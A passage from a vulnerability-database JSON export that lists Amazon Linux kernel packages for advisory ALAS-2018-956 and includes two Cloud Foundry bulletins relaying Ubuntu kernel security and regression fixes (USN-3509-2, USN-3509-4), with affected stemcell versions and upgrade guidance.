kernel-headers-4.9.81-35.56.amzn1.i686 \n kernel-debuginfo-4.9.81-35.56.amzn1.i686 \n kernel-4.9.81-35.56.amzn1.i686 \n kernel-tools-4.9.81-35.56.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.81-35.56.amzn1.i686 \n kernel-tools-devel-4.9.81-35.56.amzn1.i686 \n perf-4.9.81-35.56.amzn1.i686 \n perf-debuginfo-4.9.81-35.56.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.81-35.56.amzn1.noarch \n \n src: \n kernel-4.9.81-35.56.amzn1.src \n \n x86_64: \n kernel-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.81-35.56.amzn1.x86_64 \n kernel-devel-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-devel-4.9.81-35.56.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.81-35.56.amzn1.x86_64 \n perf-4.9.81-35.56.amzn1.x86_64 \n kernel-headers-4.9.81-35.56.amzn1.x86_64 \n kernel-debuginfo-4.9.81-35.56.amzn1.x86_64 \n kernel-tools-4.9.81-35.56.amzn1.x86_64 \n perf-debuginfo-4.9.81-35.56.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2018-02-20T21:20:00", "published": "2018-02-20T21:20:00", "id": "ALAS-2018-956", "href": "https://alas.aws.amazon.com/ALAS-2018-956.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nUnspecified\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a regression that prevented the Ceph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is unspecified unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.49\n * 3363.x versions prior to 3363.45\n * 3421.x versions prior to 3421.35\n * 3445.x versions prior to 3445.21\n * 3468.x versions prior to 3468.16\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3312.x versions to 3312.49\n * Upgrade 3363.x versions to 3363.45\n * Upgrade 3421.x versions to 3421.35\n * Upgrade 3445.x versions to 3445.21\n * Upgrade 3468.x versions to 3468.16\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n\n# References\n\n * [USN-3509-4](<https://usn.ubuntu.com/3509-4>)\n", "edition": 2, "modified": "2017-12-16T00:00:00", "published": "2017-12-16T00:00:00", "id": "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "href": "https://www.cloudfoundry.org/blog/usn-3509-4/", "title": "USN-3509-4: Linux kernel (Xenial HWE) regression | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>))\n\nIt was discovered that the Linux kernel did not properly handle copy-on- write of transparent huge pages. A local attacker could use this to cause a denial of service (application crashes) or possibly gain administrative privileges. ([CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)) Please note: this CVE is also known colloquially as \u201chuge dirty cow\u201d.\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array implementation in the Linux kernel sometimes did not properly handle adding a new entry. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>))\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.34\n * 3445.x versions prior to 3445.19\n * 3468.x versions prior to 3468.13\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.34\n * Upgrade 3445.x versions prior to 3445.19\n * Upgrade 3468.x versions prior to 3468.13\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3509-2](<http://www.ubuntu.com/usn/usn-3509-2/>)\n * [CVE-2017-16939](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16939>)\n * [CVE-2017-1000405](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000405>)\n * [CVE-2017-12193](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12193>)\n * [CVE-2017-16643](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-16643>)\n", "edition": 5, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "href": "https://www.cloudfoundry.org/blog/usn-3509-2/", "title": "USN-3509-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}